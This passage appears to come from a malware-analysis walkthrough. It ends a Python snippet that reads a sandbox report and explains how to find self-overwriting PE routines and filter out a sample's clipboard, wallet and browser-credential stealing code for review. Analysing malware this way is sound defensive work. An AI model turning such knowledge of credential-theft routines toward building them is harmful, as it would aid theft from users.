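        print("clipboard access at dump", dump_offset(r), sorted(api_fragments(r)))
    for op, dumps in shared_opcodes(recs).items():
        print("opcode", op[:16], "seen in dumps", sorted(dumps))
```

Feed it the full report text to get the same view across every function: routines whose Opcode ID recurs in both the 0x2480000 region and the 0x400000 image are the ones the "overwrites its own PE header" verdict in the header refers to, and the fragment filter is a quick way to pull out the clipboard, wallet and browser-credential routines for manual review.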